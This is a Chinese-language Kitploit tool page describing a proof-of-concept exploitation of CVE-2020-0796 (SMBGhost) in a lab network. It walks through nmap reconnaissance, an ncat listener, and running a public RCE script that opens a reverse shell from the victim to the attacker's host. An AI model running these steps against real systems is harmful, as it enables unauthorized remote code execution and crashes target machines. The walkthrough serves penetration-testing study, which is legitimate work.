Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/hungdnvp/poc-cve-2020-0796
侦察漏洞分析漏洞利用网络安全渗透测试远程访问工具
GitHubhungdnvp/poc-cve-2020-0796

POC-CVE-2020-0796

针对 CVE-2020-0796(SMBGhost)的概念验证漏洞利用,目标是 Windows 10/Server SMBv3.1.1。包括 Nmap 侦察、漏洞扫描和反向 shell 负载投递。

查看仓库
22年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

*- 受影响版本

  • Windows 10 Version 1903 for 32-bit Systems
  • Windows 10 Version 1903 for ARM64-based Systems
  • Windows 10 Version 1903 for x64-based Systems
  • Windows 10 Version 1909 for 32-bit Systems
  • Windows 10 Version 1909 for ARM64-based Systems
  • Windows 10 Version 1909 for x64-based Systems
  • Windows Server, version 1903 (Server Core installation)
  • Windows Server, version 1909 (Server Core installation)

系统连接示意图

image-20240223154022321

目标侦察

启动 Nmap 扫描 DMZ 区域网络

root@kitploit:~
map -sS 192.168.116.0/24  

nmap:网络扫描程序名称。

-sS:选择 TCP SYN 扫描方法。在此扫描中,Nmap 向目标主机发送一个 SYN 数据包并观察响应。如果目标主机回复 SYN-ACK 数据包,Nmap 知道该端口是开放的。如果目标主机回复 RST 数据包,则表示该端口已关闭。

192.168.116.0/24:要扫描的特定 IP 地址或地址范围。在此情况下,地址范围为 192.168.116.0/24,描述从 192.168.116.1 到 192.168.116.254 的所有 IP 地址。

image-scanNmap

=> 观察到 victim 机器的 IP 地址 192.168.116.145 上 445 端口已开放。

· 使用 Nmap 扫描 victim 机器的漏洞

root@kitploit:~
map -p445 –script smb-protocols 192.168.116.145  

nmap:网络扫描程序名称。

-p445:指定要扫描的特定端口,这里是端口 445。端口 445 通常用于 Windows 系统上的 SMB(服务器消息块)服务通信。

--script smb-protocols:选择 smb-protocols 脚本执行扫描。此脚本用于检查并显示目标主机上支持的 SMB 协议版本信息。

192.168.116.145:要扫描的目标主机 IP 地址。此处设置为 192.168.116.145。

image-sanNmap2

  • 从 smb-protocols 的结果得知,victim 机器可能存在可利用的 SMBv3.1.1 漏洞。
  • 为了进一步确认,继续通过运行 python 脚本来检查 CVE-2020-0796 漏洞的可利用性。

[]: -https://github.com/ly4k/SMBGhost "利用代码"

image-nmapcheck

=> 结果显示 Vulnerable → 在 victim 机器上发现存在可利用的 CVE-2020-0796 漏洞。

漏洞利用、植入恶意代码、建立远程控制通道

实施 Reverse_shell 攻击

使用 Netcat 启动会话监听 victim 的连接

root@kitploit:~
ncat -lvp 4444  

启动 CVE-2020-0796 利用脚本

[]: https://github.com/jamf/CVE-2020-0796-RCE-POC "利用代码"

root@kitploit:~
python SMBleedingGhost.py 192.168.116.145 192.168.44.3 4444  

image-attack

=> 结果: 攻击机取得了 victim 机器上 shell 代码的执行权限。

image-result

连接成功后,攻击者可以以当前连接会话中的用户权限在 victim 机器上任意执行和利用代码。

会话结束时,victim 机器会蓝屏并自动重启。

image-end

执行漏洞利用可能导致目标系统损坏

下载工具